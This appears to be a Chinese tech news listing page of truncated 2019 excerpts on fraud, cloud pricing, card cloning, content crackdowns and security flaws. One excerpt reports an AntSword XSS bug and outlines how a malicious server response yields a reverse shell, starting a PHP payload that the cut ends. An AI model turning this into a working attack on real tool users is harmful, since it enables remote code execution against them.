新闻资讯

经过鹅探长及全体黑产研究人员整整一年的努力，干货爆满、厚达百页的《腾讯110反欺诈白皮书》终于来了！里面包含2018年十大诈骗类型，192种网络诈骗手法 让我们通过一张图来了解下它吧

10年像我们这样的小站长基本都是用虚拟机空间，在回来vps。如今的服务器非常便宜。因为给客户做程序、网站需要用服务器，阿里云、腾讯云、百度云、京东云、景安云、浪潮云还有一些小公司的服务器都用过。华为云、沃云、电信云这些个人没用过不做评价。阿里云不用说，是国内最好的。也是最方便最人性化的。搞活动的时候优惠力度也非常大，新用户可以免费领6个月。腾讯云和百度云感觉差不多不分上下，活动也比较频繁。价格也比阿里相对便宜点。但也便宜不了多少。京东云服务器稳定性和服务也不逊色，活动少点。赠送过本人5000元的

前言是人性的泯灭，还是道德的沦丧，为何同服务器价格相差如此巨大，是杀熟还是杀生？欢迎走进本期的闲言碎语，让我们看一宗腾讯云价格悬疑案首先是这样的，一个朋友找我要腾讯云服务器的购买链接，我给他翻出购买链接后再次访问的时候我发现了一件很匪夷所思的事情同样地区为香港，配置为入门配置（1核1GB），镜像为《Windows Server 2012 R2数据中心版 64位中文版》，公网带宽1Mbps，数量1台，购买时长1个月时，我发现：一个页面的价格为：115.00元一个页面的价格为：117.50元先放对比

网传消息，山东淄博，某大学的在校大学生刘某花费1500元在网上购买了一台复制饭卡的设备，经多次失败最终学会复制饭卡。从2018年底开始，他复制了山东省十几所学校的饭卡，累计销售3千多张，获利10万元。据学校食堂管理员表示，“当时学生来充卡，发现了负数。反正陆陆续续的负数越来越多了。咱们通过后面的平台查出来，这个卡有可能复制了。”随后学校食堂报警，警方经调查后发现，是某大学的在校大学生刘某所为。[dplayer url="https://jnsfdzkj-my.sharepoint.co

最近在整理各种漏洞的利用技巧，我在Freebuf上每天都能获取很多干货，为了回馈freebuf和各位小伙伴，希望我的文章能帮到大家，希望大家能将这种分享精神发扬光大！本文仅用于安全教育和技术研究学习,切勿违法使用。一、经典漏洞复现(MS08-067)非常感谢John Lambert在几年前发表的MS08-067漏洞事件回忆录，它帮我们认识到，即使身处今天这样复杂的攻击威胁下，MS08-067漏洞事件仍然具有参考和借鉴意义。Conficker蠕虫利用了MS08-067漏洞，加入了NetBIOS感染

4月12日凌晨，有用户在中国蚁剑GitHub上提交了issue，称发现中国蚁剑存在XSS漏洞，借此可引起RCE。据悉，该漏洞是因为在webshell远程连接失败时，中国蚁剑会返回错误信息，但因为使用的是html解析，导致xss漏洞。当通过中国蚁剑连接webshell，出现连接失败情况时，中国蚁剑会返回错误信息，如下图：而该信息并没有进行 XSS 保护，因此能够利用 js 调用 perl 便可反弹攻击者的shell。<?php header('HTTP/1.1 5

国内著名文字写作赚钱平台简书因用户分享翻墙相关软件、技术教程而被国家网信主管部门要求对平台上所有内容进行全面整改，整改时间2019年4月13日0时至4月19日0时。据twitter网友<a            @jvbaoillegal爆料，简书的限改令是被用户举报平台上存在大量不和谐内容导致。@jvbaoillegal在twitter上公开自己与违法翻墙斗争的记录。    最新举报成果：简书网站充

普通版和Beta版的区别————————————普通版是公开发布的版本，Beta版是内部测试版本。Beta版增加了账号系统只有群成员才可以申请使用；beta版更稳定的极速下载，支持网盘视频文件原画质在线播放、http/https链接下载以及一些暂未公布的隐藏功能。什么叫秒传？用户在使用度盘分享文件，经常会遇到度盘链接被和谐，特别是一些资源站长在分享资源时经常遇到用户反馈度盘分享链接失效了，还得经常更新度盘链接。PanDownload为此创造了秒传链接，此链接也是一种分享链接，不限文件大小享有一键

对于不少搭建有自己博客的用户来说，最近可能发生了一些事情让他们有些烦恼。那就是新浪微博图床在近期已经逐渐开启了防盗链，导致不少曾经依赖新浪微博图床的博客图片均无法显示。此前，对于大多数个人博客维护者而言，免费的图床即使节省成本，也能够提升页面访问速度的最佳手段，而新浪微博图床则成了首选。新浪微博由于本身体量大，其图床免费无限容量，只需要有一个微博账号就可使用。同时具备全网 CDN 加速，支持 HTTPS，无论是国内还是国外网络访问，速度都很不错，而且新浪如此企业，不会像其他个人或者团队经营的免费

      高通日前已经确认该公司生产的多款芯片组存在安全漏洞，这些芯片组已应用在全球数以亿计的安卓设备上。研究人员透露该漏洞主要可以让攻击者检索存储在高通安全执行环境中安全区域的私人数据以及加密密钥等。这个被称为高通安全执行环境(QSEE)与英特尔处理器的软件防护扩展(SGX)类似 ,  主要用于保护软件的数据。高通已发布安全更新但需要安卓厂商更新固件：高通确认漏洞的同时也表示已经在本月初发布安全更新封堵漏洞，接下来需要安卓设备制造商们推送新固件。然而大

5月11日消息，陌陌社交app发布公告，将暂时性关闭用户发布动态功能，本次暂时关闭用户发布动态功能被要求整改，为期一个月。陌陌公司5月10日发布公告称，根据有关政府部门指导通知，在自 2019 年 5 月 11 日起的一个月中，公司将推出相关内部措施，以加强内容安全方面的工作。陌陌表示，除其他相关自查措施外，此次自查工作中的重点，为公司将在 2019 年 5 月 11 日至 2019 年 6 月 11 日期间，暂时性的关闭用户发布动态的功能。目前，对此项自查措施可能对公司运营产生的影响陌陌正在进